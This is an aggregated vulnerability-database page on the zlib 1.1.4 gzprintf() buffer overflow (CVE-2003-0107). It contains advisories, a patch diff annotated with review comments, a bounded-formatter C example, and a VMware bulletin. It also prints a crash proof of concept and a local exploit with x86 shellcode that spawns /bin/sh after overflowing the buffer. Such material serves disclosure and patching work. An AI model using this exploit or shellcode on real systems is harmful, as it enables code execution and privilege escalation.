CVE-2003-0107
CVSS7.5
Published: 2003-03-07 00:00:00
Revised: 2016-10-17 22:29:36

[Original] Buffer overflow in the gzprintf function in zlib 1.1.4, when zlib is compiled without vsnprintf or when long inputs are truncated using vsnprintf, allows attackers to cause a denial of service or possibly execute arbitrary code.


[CNNVD] zlib compression library gzprintf() buffer overflow vulnerability (CNNVD-200303-040)

        
zlib is a popular compression library used by many applications, including the well-known SSH implementation.
zlib's gzprintf() function does not properly check user-supplied data. A remote attacker can exploit this to cause a buffer overflow and possibly execute arbitrary instructions on the system with the privileges of the application process that uses this function.
zlib's gzprintf() function behaves like fprintf(); if the arguments passed to it expand to more than the number of bytes defined by Z_PRINTF_BUFSIZE (4096 by default), a buffer overflow is triggered, and carefully crafted data may allow arbitrary instructions to be executed on the system with the privileges of the application process that uses this function.
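The fixed 4096-byte buffer described above is the whole of this bug: zlib 1.1.4's gzprintf() formats into a Z_PRINTF_BUFSIZE stack buffer, and a build without vsnprintf() does that with unbounded vsprintf(). The C program below is an added example, not zlib's code: a gzprintf-style wrapper (the names gzprintf_bounded, count_sink and the FMT_* codes are hypothetical) that formats into a buffer of the same size with vsnprintf() and, as the patch's README.vsnprintf insists, uses the return value to refuse output that would not fit instead of passing on a silently truncated string. The gzwrite() step is replaced by a counting callback so the program runs without a gzFile.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* zlib's default buffer size for gzprintf(), as the description states. */
#define Z_PRINTF_BUFSIZE 4096

/* Result codes of this example's formatter (hypothetical, not zlib's). */
enum { FMT_TRUNCATED = -1, FMT_ERROR = -2 };

/* Sink standing in for gzwrite(): receives len bytes, returns bytes taken. */
typedef int (*sink_fn)(const char *data, size_t len, void *ctx);

/* Format into a Z_PRINTF_BUFSIZE stack buffer the way zlib 1.1.4's
 * gzprintf() does, but use the vsnprintf() return value to detect output
 * that did not fit and refuse it rather than hand on a truncated string.
 * Returns bytes given to the sink, 0 for empty output, or a FMT_* code. */
int gzprintf_bounded(sink_fn sink, void *ctx, const char *fmt, ...)
{
    char buf[Z_PRINTF_BUFSIZE];
    va_list ap;
    int n;

    va_start(ap, fmt);
    /* vsnprintf() writes at most sizeof buf bytes (NUL included) and
     * returns the length the complete output would have had. */
    n = vsnprintf(buf, sizeof buf, fmt, ap);
    va_end(ap);

    if (n < 0)
        return FMT_ERROR;                 /* encoding or format failure */
    if ((size_t)n >= sizeof buf)
        return FMT_TRUNCATED;             /* would not fit: write nothing */
    if (n == 0)
        return 0;
    return sink(buf, (size_t)n, ctx);
}

/* Constructed sink that only counts bytes, so no gzFile is needed. */
static int count_sink(const char *data, size_t len, void *ctx)
{
    (void)data;
    *(size_t *)ctx += len;
    return (int)len;
}

/* A short message fits and is written whole: 7 bytes for "Hello1\n". */
int demo_short(void)
{
    size_t total = 0;
    return gzprintf_bounded(count_sink, &total, "Hello%d\n", 1);
}

/* The PoC's "%10240s" expands "" to 10240 spaces, over twice the buffer.
 * The bounded version returns FMT_TRUNCATED and writes nothing; zlib 1.1.4
 * built without vsnprintf() overflows its buffer at this point instead. */
int demo_poc_format(void)
{
    size_t total = 0;
    return gzprintf_bounded(count_sink, &total, "%10240s", "");
}

/* Boundary check with width bytes of padding: 4095 fits (4095 + NUL),
 * 4096 does not. */
int demo_width(int width)
{
    size_t total = 0;
    return gzprintf_bounded(count_sink, &total, "%*s", width, "");
}

int main(void)
{
    printf("short       -> %d\n", demo_short());
    printf("%%10240s     -> %d\n", demo_poc_format());
    printf("width 4095  -> %d\n", demo_width(4095));
    printf("width 4096  -> %d\n", demo_width(4096));
    return 0;
}
```

The design point is the `(size_t)n >= sizeof buf` test: zlib 1.1.4 computed the length with `strlen(buf)` after formatting, so even a build that did use vsnprintf() could not tell a 4095-byte message from one that had been cut off, which is exactly why the README.vsnprintf below makes a return value the critical requirement.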
        

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0107
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0107
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-040
(official data source) CNNVD

- Other links and resources

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2003-011.0.txt
(UNKNOWN)  CALDERA  CSSA-2003-011.0
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-004.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2003-004
http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000619
(UNKNOWN)  CONECTIVA  CLSA-2003:619
http://lists.apple.com/mhonarc/security-announce/msg00038.html
(UNKNOWN)  CONFIRM  http://lists.apple.com/mhonarc/security-announce/msg00038.html
http://marc.info/?l=bugtraq&m=104610337726297&w=2
(UNKNOWN)  BUGTRAQ  20030223 poc zlib sploit just for fun :)
http://marc.info/?l=bugtraq&m=104610536129508&w=2
(UNKNOWN)  BUGTRAQ  20030224 Re: buffer overrun in zlib 1.1.4
http://marc.info/?l=bugtraq&m=104620610427210&w=2
(UNKNOWN)  BUGTRAQ  20030225 [sorcerer-spells] ZLIB-SORCERER2003-02-25
http://marc.info/?l=bugtraq&m=104887247624907&w=2
(UNKNOWN)  GENTOO  GLSA-200303-25
http://online.securityfocus.com/archive/1/312869
(UNKNOWN)  BUGTRAQ  20030222 buffer overrun in zlib 1.1.4
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57405
(UNKNOWN)  SUNALERT  57405
http://www.iss.net/security_center/static/11381.php
(VENDOR_ADVISORY)  XF  zlib-gzprintf-bo(11381)
http://www.kb.cert.org/vuls/id/142121
(UNKNOWN)  CERT-VN  VU#142121
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2003:033
(UNKNOWN)  MANDRAKE  MDKSA-2003:033
http://www.redhat.com/support/errata/RHSA-2003-079.html
(UNKNOWN)  REDHAT  RHSA-2003:079
http://www.redhat.com/support/errata/RHSA-2003-081.html
(UNKNOWN)  REDHAT  RHSA-2003:081
http://www.securityfocus.com/bid/6913
(UNKNOWN)  BID  6913

- Vulnerability information

zlib compression library gzprintf() buffer overflow vulnerability
High risk  Boundary condition error
2003-03-07 00:00:00 2006-09-20 00:00:00
Remote
        
        

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Third-party patch:
        diff -Naur zlib-1.1.4/ChangeLog zlib-1.1.4-vsnprintf/ChangeLog
        --- zlib-1.1.4/ChangeLog 2002-03-11 15:02:35.000000000 +0000
        +++ zlib-1.1.4-vsnprintf/ChangeLog 2003-02-24 05:31:41.000000000 +0000
        @@ -1,6 +1,13 @@
        
         ChangeLog file for zlib
        
        +Changes in 1.1.4-patched (23 February 2003)
        +- fix a security vulnerability related to improper use of snprintf/vsnprintf
        + function.
        +- ./configure now detects the presence of snprintf/vsnprintf and enables it
        + automatically if present.
        +- README.vsnprintf added.
        +
         Changes in 1.1.4 (11 March 2002)
         - ZFREE was repeated on same allocation on some error conditions.
         This creates a security problem described in
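Review bot: the new entry never names the affected function. The README.vsnprintf added by this same patch says the problem is in gzprintf(), so `+- fix a security vulnerability related to improper use of snprintf/vsnprintf` should say so as well (for example "fix a buffer overflow in gzprintf() caused by unchecked vsprintf()/vsnprintf() output"), since the ChangeLog is what packagers and vulnerability scanners actually read.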
        diff -Naur zlib-1.1.4/README.vsnprintf zlib-1.1.4-vsnprintf/README.vsnprintf
        --- zlib-1.1.4/README.vsnprintf 1970-01-01 00:00:00.000000000 +0000
        +++ zlib-1.1.4-vsnprintf/README.vsnprintf 2003-02-24 05:13:28.000000000 +0000
        @@ -0,0 +1,23 @@
        +During a recent audit of zlib-1.1.4, a buffer-overflow and string-format
        +vulnerability was found in the gzprintf() function. This has been corrected in
        +this version of zlib; in addition, some ./configure checks have been added to
        +make sure the host system can utilize the corrections fully.
        +
        +As a result, it is now strongly recommended that your host system or compiler
        +provide a fully C99-compliant implementation of the vsnprintf() function.
        +Anything less will reduce the functionality and/or security of the gzprintf()
        +function. The most critical aspect is that vsnprintf() should be present and
        +should provide a return value. If this function is missing, one of the
        +fallback functions (vsprintf(), snprintf(), vsnprintf()) will have to be used,
        +and if so, they too should return a value. If your system is lacking in any of
        +these aspects, the ./configure script should warn you and refer you to this
        +file.
        +
        +In addition, the HAS_vsnprintf and HAS_snprintf macros are automatically
        +defined if these functions are available. zlib-1.1.4 and older versions did
        +not do this, potentially leading to a broken and vulnerable zlib even when the
        +host system supported the requisite functionality to avoid this.
        +
        +
        + -- Kelledin <kelledin@users.sourceforge.net>
        +
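Review bot: the fallback list in `+fallback functions (vsprintf(), snprintf(), vsnprintf()) will have to be used,` names vsnprintf() as a fallback for itself. The configure checks in this patch fall back to vsprintf() when vsnprintf() is missing and to snprintf() when STDC is not defined, so the parenthesis should list those two and drop vsnprintf(). It would also help to state the concrete consequence the text hints at: without a return value, truncation cannot be detected and gzprintf() writes a silently shortened string.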
        diff -Naur zlib-1.1.4/configure zlib-1.1.4-vsnprintf/configure
        --- zlib-1.1.4/configure 1998-07-08 18:19:35.000000000 +0000
        +++ zlib-1.1.4-vsnprintf/configure 2003-02-24 05:13:28.000000000 +0000
        @@ -156,6 +156,209 @@
         fi
        
         cat > $test.c <        +#include
        +
        +#if (defined(__MSDOS__) || defined(_WINDOWS) || defined(_WIN32) || defined(__WIN32__) || defined(WIN32) || defined(__STDC__) || defined(__cplusplus) || defined(__OS2__)) && !defined(STDC)
        +# define STDC
        +#endif
        +
        +int main() {
        + int i;
        +
        + i=0;
        +#ifndef STDC
        + choke me
        +#endif
        +
        + return 0;
        +}
        +EOF
        +
        +if test "`($CC -c $CFLAGS $test.c) 2>&1`" = ""; then
        + echo "Checking whether to use vsnprintf() or snprintf()... using vsnprintf()"
        +
        + cat > $test.c <        +#include
        +#include
        +
        +int mytest(char *fmt, ...) {
        + char buf[20];
        + va_list ap;
        +
        + va_start(ap, fmt);
        + vsnprintf(buf, sizeof(buf), fmt, ap);
        + return 0;
        +}
        +
        +int main() {
        + return (mytest("Hello%d\n", 1));
        +}
        +EOF
        +
        + if test "`($CC -c $CFLAGS $test.c) 2>&1`" = ""; then
        + CFLAGS="$CFLAGS -DHAS_vsnprintf"
        + echo "Checking for vsnprintf() in stdio.h... Yes."
        +
        + cat > $test.c <        +#include
        +#include
        +
        +int mytest(char *fmt, ...) {
        + int i;
        + char buf[20];
        + va_list ap;
        +
        + va_start(ap, fmt);
        + i=vsnprintf(buf, sizeof(buf), fmt, ap);
        + return 0;
        +}
        +
        +int main() {
        + return (mytest("Hello%d\n", 1));
        +}
        +EOF
        +
        + if test "`($CC -c $CFLAGS $test.c) 2>&1`" = ""; then
        + CFLAGS="$CFLAGS -DHAS_vsnprintf_return"
        + echo "Checking for return value of vsnprintf()... Yes."
        + else
        + echo "Checking for return value of vsnprintf()... No."
        + echo " WARNING: apparently vsnprintf() does not return a value. zlib"
        + echo " can build but will be open to possible string-format security"
        + echo " vulnerabilities. See README.vsnprintf for more info."
        + echo
        + fi
        + else
        + echo "Checking for vsnprintf() in stdio.h... No."
        + echo " WARNING: vsnprintf() not found, falling back to vsprintf(). zlib"
        + echo " can build but will be open to possible buffer-overflow security"
        + echo " vulnerabilities. See README.vsnprintf for more info."
        + echo
        +
        + cat > $test.c <        +#include
        +#include
        +
        +int mytest(char *fmt, ...) {
        + int i;
        + char buf[20];
        + va_list ap;
        +
        + va_start(ap, fmt);
        + i=vsprintf(buf, fmt, ap);
        + return 0;
        +}
        +
        +int main() {
        + return (mytest("Hello%d\n", 1));
        +}
        +EOF
        +
        + if test "`($CC -c $CFLAGS $test.c) 2>&1`" = ""; then
        + CFLAGS="$CFLAGS -DHAS_vsprintf_return"
        + echo "Checking for return value of vsprintf()... Yes."
        + else
        + echo "Checking for return value of vsprintf()... No."
        + echo " WARNING: apparently vsprintf() does not return a value. zlib"
        + echo " can build but will be open to possible string-format security"
        + echo " vulnerabilities. See README.vsnprintf for more info."
        + echo
        + fi
        + fi
        +else
        + echo "Checking whether to use vsnprintf() or snprintf()... using snprintf()"
        +
        + cat > $test.c <        +#include
        +#include
        +
        +int mytest() {
        + char buf[20];
        + va_list ap;
        +
        + va_start(ap, fmt);
        + snprintf(buf, sizeof(buf), fmt, ap);
        + return 0;
        +}
        +
        +int main() {
        + return (mytest());
        +}
        +EOF
        +
        + if test "`($CC -c $CFLAGS $test.c) 2>&1`" = ""; then
        + CFLAGS="$CFLAGS -DHAS_snprintf"
        + echo "Checking for snprintf() in stdio.h... Yes."
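Review bot: the snprintf() probe cannot compile on any system, so `-DHAS_snprintf` is never added. `+int mytest() {` declares no `fmt` parameter, yet the body runs `+ va_start(ap, fmt);` and then `+ snprintf(buf, sizeof(buf), fmt, ap);` passes a va_list where snprintf() expects variadic arguments. Both are compile errors, so the `$CC -c` test always fails and non-STDC builds stay on the unchecked path. The probe should simply call `snprintf(buf, sizeof(buf), "Hello%d\n", 1)` with no va_list at all, mirroring the shape of the vsnprintf() probe above. Note also that the hunk as shown ends at the `Checking for snprintf() in stdio.h... Yes.` line, so the remainder of that branch and its closing `fi` could not be reviewed here, and the `cat > $test.c <` heredoc lines appear to have lost their `<<EOF` markers and header names in transcription.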

- Vulnerability information (22273)

Zlib 1.1.4 Compression Library gzprintf() Buffer Overrun Vulnerability (1) (EDBID:22273)
linux dos
2003-02-23 Verified
0 Richard Kettlewell
N/A [Download]
source: http://www.securityfocus.com/bid/6913/info

A buffer-overrun vulnerability has been reported in the Zlib compression library. Due to the use of 'vsprintf()' by an internal Zlib function, an attacker can cause memory to become corrupted. This buffer overrun occurs because the software fails to check the boundaries of user-supplied data given to the 'gzprintf()' function.

Successful exploitation of this vulnerability may allow an attacker to execute arbitrary instructions.

Note that only Zlib 1.1.4 has been reported vulnerable to this issue. It is not yet known whether earlier versions are also affected. 

#include <zlib.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

int main(void) {
  gzFile f;
  int ret;

  /* Any writable gzFile will do: the overrun happens while gzprintf()
     formats into its fixed Z_PRINTF_BUFSIZE buffer. */
  if(!(f = gzopen("/dev/null", "w"))) {
    perror("/dev/null");
    exit(1);
  }
  /* "%10240s" expands to 10240 spaces, far past the 4096-byte buffer. */
  ret = gzprintf(f, "%10240s", "");
  printf("gzprintf -> %d\n", ret);
  ret = gzclose(f);
  printf("gzclose -> %d [%d]\n", ret, errno);
  exit(0);
}


- Vulnerability information (22274)

Zlib 1.1.4 Compression Library gzprintf() Buffer Overrun Vulnerability (2) (EDBID:22274)
linux remote
2003-02-23 Verified
0 CrZ
N/A [Download]
source: http://www.securityfocus.com/bid/6913/info
 

/*  C local exploit for zlib <= 1.1.4
 \      just for fun..not for root :)
 /
 \   Usage: gcc -o zlib zlib.c -lz
 /
 \   by CrZ [crazy_einstein@yahoo.com] lbyte
 /   [lbyte.void.ru]
*/

#include <zlib.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

int main(int argc, char **argv) {
        /* x86 Linux payload: setuid/setgid, then execve of /bin/sh */
        char shell[]=
                "\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
                "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
                "\xc0\x88\x43\x07\x89\x5b\x08\x89"
                "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
                "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
                "/bin/sh";
        gzFile f;
        int ret;
        long xret;
        char cret[10];
        char badbuff[10000];
        int i;

        (void)argc;
        (void)argv;

        /* recover the address of the payload buffer as an integer */
        sprintf(badbuff,"%p",shell);
        sscanf(badbuff,"0x%lx",&xret);

        printf("[>] exploiting...\n");

        if(!(f = gzopen("/dev/null", "w"))) {
                perror("/dev/null");
                exit(1);
        }

        printf("[>] xret = 0x%lx\n",xret);

        /* little-endian bytes of the address, repeated as the filler */
        sprintf(cret,"%c%c%c%c",(int)((xret&0xff)+4),(int)((xret>>8)&0xff),
                (int)((xret>>16)&0xff),(int)((xret>>24)&0xff));

        bzero(badbuff,sizeof(badbuff));

        /* 5000 bytes of filler: more than gzprintf()'s 4096-byte buffer */
        for(i=0;i<5000;i+=4) strcat(badbuff,cret);

        setuid(0);
        setgid(0);
        /* the original passed stderr here; f is the gzFile opened above */
        ret = gzprintf(f, "%s", badbuff );
        setuid(0);
        setgid(0);
        printf(">Sent!..\n");
        printf("gzprintf -> %d\n", ret);
        ret = gzclose(f);
        printf("gzclose -> %d [%d]\n", ret, errno);

        exit(0);
}


- Vulnerability information (F55667)

VMware Security Advisory 2007-0003 (PacketStormID:F55667)
2007-04-05 00:00:00
VMware  vmware.com
advisory
CVE-2005-3011,CVE-2006-4810,CVE-2007-1270,CVE-2007-1271,CVE-2005-2096,CVE-2005-1849,CVE-2003-0107,CVE-2005-1704
[Download]

VMware Security Advisory - ESX 3.0.1 and 3.0.0 patches address several security issues.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- -------------------------------------------------------------------
                   VMware Security Advisory

Advisory ID:       VMSA-2007-0003
Synopsis:          VMware ESX 3.0.1 and 3.0.0 server security updates
Issue date:        2007-04-02
Updated on:        2007-04-02
CVE numbers:       CVE-2005-3011 CVE-2006-4810 CVE-2007-1270
                   CVE-2007-1271 CVE-2005-2096 CVE-2005-1849
                   CVE-2003-0107 CVE-2005-1704
- -------------------------------------------------------------------

1. Summary:

ESX 3.0.1 and 3.0.0 patches address several security issues.

2. Relevant releases:

VMware ESX 3.0.1 without patches ESX-2559638, ESX-1161870, ESX-3416571,
ESX-5011126, ESX-7737432, ESX-7780490, ESX-8174018, ESX-8852210,
ESX-9617902,
ESX-9916286

VMware ESX 3.0.0 without patches ESX-1121906, ESX-131737, ESX-1870154,
ESX-392718, ESX-4197945, ESX-4921691, ESX-5752668, ESX-7052426, ESX-3616065

3. Problem description:

Problems addressed by these patches:

a.   texinfo service console update

     Updated texinfo packages for the service console that fix two
     security vulnerabilities are now available.  A buffer overflow in
     the program texinfo could allow a local user to execute arbitrary
     code in the service console via a crafted texinfo file, and could
     allow a local user to overwrite arbitrary files via a symlink
     attack on temporary files.

     The Common Vulnerabilities and Exposures project (cve.mitre.org)
     has assigned the names CVE-2005-3011 and CVE-2006-4810 to these
     issues.

     ESX 301 Download Patch ESX-2559638
     ESX 300 Download Patch ESX-1121906

b.   This bundle is a group of patches to resolve two possible security
issues.

     They are as follows:
     A VMware internal security audit revealed a double free condition.
     It may be possible for an attacker to influence the operation of
     the system. In most circumstances, this influence will be limited
     to denial of service or information leakage, but it is
     theoretically possible for an attacker to insert arbitrary code
     into a running program. This code would be executed with the
     permissions of the vulnerable program.  There are no known exploits
     for this issue.

     The Common Vulnerabilities and Exposures project (cve.mitre.org)
     has assigned the name CVE-2007-1270 to this issue.

     A VMware internal security audit revealed a potential buffer
     overflow condition. There are no known vulnerabilities, but such
     vulnerabilities may be used to elevate privileges or to crash the
     application and thus cause a denial of service.

     The Common Vulnerabilities and Exposures project (cve.mitre.org)
     has assigned the name CVE-2007-1271 to this issue.

     The following patches are contained within this bundle:

     ESX 301                      ESX 300
     -------                     --------
     ESX-1161870                  ESX-131737
     ESX-3416571                  ESX-1870154
     ESX-5011126                  ESX-392718
     ESX-7737432                  ESX-4197945
     ESX-7780490                  ESX-4921691
     ESX-8174018                  ESX-5752668
     ESX-8852210                  ESX-7052426
     ESX-9617902                  ESX-9976400

     ESX 301 Download Patch Bundle ESX-6431040
     ESX 300 Download Patch Bundle ESX-5754280

c.   This patch updates internally used zlib libraries in order to
     address potential security issues with older versions of this
     library.

     The Common Vulnerabilities and Exposures project (cve.mitre.org)
     has assigned the names CVE-2005-2096, CVE-2005-1849, CVE-2003-0107
     to these issues.

     ESX 301 Download Patch ESX-9916286
     ESX 300 Download Patch ESX-3616065

d.  binutils service console update

     NOTE: This vulnerability and update only apply to ESX 3.0.0.

     An integer overflow in the Binary File Descriptor (BFD) library for
     the GNU Debugger before version 6.3, binutils, elfutils, and
     possibly other packages, allows user-assisted attackers to execute
     arbitrary code via a crafted object file that specifies a large
     number of section headers, leading to a heap-based buffer overflow.

     The Common Vulnerabilities and Exposures project (cve.mitre.org)
     has assigned the name CVE-2005-1704 to this issue.

     ESX 300 Download Patch ESX-55052

4. Solution:

Please review the Patch notes for your version of ESX and verify the
md5sum of your downloaded file.

  ESX 3.0.1
  http://www.vmware.com/support/vi3/doc/esx-2559638-patch.html
  md5sum 9ee9d9769dfe2668aa6a4be2df284ea6

  http://www.vmware.com/support/vi3/doc/esx-6431040-patch.html
  md5sum ef6bc745b3d556e0736fd39b8ddc8087

  http://www.vmware.com/support/vi3/doc/esx-9916286-patch.html
  md5sum 7b98cfe1b2e0613c368d4080dcacccb8

  ESX 3.0.0
  http://www.vmware.com/support/vi3/doc/esx-55052-patch.html
  md5sum 8d45e36ec997707ebe68d84841026fef

  http://www.vmware.com/support/vi3/doc/esx-1121906-patch.html
  md5sum 02c5bcccea156dd0db93177e5e3fab8b

  http://www.vmware.com/support/vi3/doc/esx-3616065-patch.html
  md5sum 90e4face2edaab07080531a37a49ec01

  http://www.vmware.com/support/vi3/doc/esx-5754280-patch.html
  md5sum 82b3c7e18dd1422f30c4aa9e477c6a27

5. References:

  ESX 3.0.1

Patch URL:http://www.vmware.com/support/vi3/doc/esx-2559638-patch.html
Patch URL:http://www.vmware.com/support/vi3/doc/esx-6431040-patch.html
Patch URL:http://www.vmware.com/support/vi3/doc/esx-9916286-patch.html
Knowledge base URL:http://kb.vmware.com/kb/2559638
Knowledge base URL:http://kb.vmware.com/kb/6431040
Knowledge base URL:http://kb.vmware.com/kb/9916286

  ESX 3.0.0

Patch URL:http://www.vmware.com/support/vi3/doc/esx-55052-patch.html
Patch URL:http://www.vmware.com/support/vi3/doc/esx-1121906-patch.html
Patch URL:http://www.vmware.com/support/vi3/doc/esx-3616065-patch.html
Patch URL:http://www.vmware.com/support/vi3/doc/esx-5754280-patch.html
Knowledge base URL:http://kb.vmware.com/kb/55052
Knowledge base URL:http://kb.vmware.com/kb/1121906
Knowledge base URL:http://kb.vmware.com/kb/3616065
Knowledge base URL:http://kb.vmware.com/kb/55052


  CVE numbers

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3011
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4810
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1270
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1271
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2096
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1849
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0107
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1704

6. Contact:

http://www.vmware.com/security

VMware Security Response Policy
http://www.vmware.com/vmtn/technology/security/security_response.html

E-mail:  security@vmware.com

Copyright 2007 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGFAiH6KjQhy2pPmkRCDhvAJ9IdzXG4Ino7NGYPnRvW5ZLFMdhRgCgk1Rr
bGpwMyFZk0OMLWyA/L8PODQ=
=MjIU
-----END PGP SIGNATURE-----
    

- Vulnerability information

6599
zlib gzprintf() Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A local overflow exists in zlib. The gzprintf() function fails to validate input resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2003-02-21 Unknown
2003-02-21 Unknown

- Solution

Upgrade to version 1.1.4-r1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

- Vulnerability information

Zlib Compression Library gzprintf() Buffer Overrun Vulnerability
Boundary Condition Error 6913
Yes No
2003-02-23 12:00:00 2007-04-06 02:52:00
The discovery of this vulnerability has been credited to Richard Kettlewell <rjk@greenend.org.uk>.

- Affected program versions

zlib zlib 1.1.4
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ GLT GLT 0.6
+ NetBSD NetBSD 1.6
+ NetBSD NetBSD 1.5.3
+ NetBSD NetBSD 1.5.2
+ NetBSD NetBSD 1.5.1
+ NetBSD NetBSD 1.5
- NullSoft Winamp 2.79
+ OpenPKG OpenPKG 1.2
+ OpenPKG OpenPKG 1.1
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux Advanced Work Station 2.1
+ Sun Cobalt Qube 3
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt Qube3 Japanese 4000WGJ
+ Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ
+ Sun Cobalt Qube3 Japanese w/Caching 4010WGJ
+ Sun Cobalt Qube3 w/ Caching and RAID 4100WG
+ Sun Cobalt Qube3 w/Caching 4010WG
+ Sun Cobalt RaQ 4
+ Sun Cobalt RaQ XTR
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ XTR Japanese 3500R-ja
+ Sun Cobalt RaQ4 3001R
+ Sun Cobalt RaQ4 Japanese RAID 3100R-ja
+ Sun Cobalt RaQ4 RAID 3100R
+ Sun Linux 5.0
VMWare ESX Server 3.0.1
VMWare ESX Server 3.0
Sun SunOS 5.9 _x86
Sun SunOS 5.9
SGI ProPack 2.3
SGI ProPack 2.2.1
SCO Open Server 5.0.7
SCO Open Server 5.0.6
SCO Open Server 5.0.5

- Vulnerability discussion

A buffer-overrun vulnerability has been reported in the Zlib compression library. Due to the use of 'vsprintf()' by an internal Zlib function, an attacker can cause memory to become corrupted. This buffer overrun occurs because the software fails to check the boundaries of user-supplied data given to the 'gzprintf()' function.

Successful exploitation of this vulnerability may allow an attacker to execute arbitrary instructions.

Note that only Zlib 1.1.4 has been reported vulnerable to this issue. It is not yet known whether earlier versions are also affected.

- Exploitation

The following proof-of-concept exploits have been made available:

- Solution

Please see the references for more information.


zlib zlib 1.1.4

Sun SunOS 5.9

Sun SunOS 5.9 _x86

- References

 

 
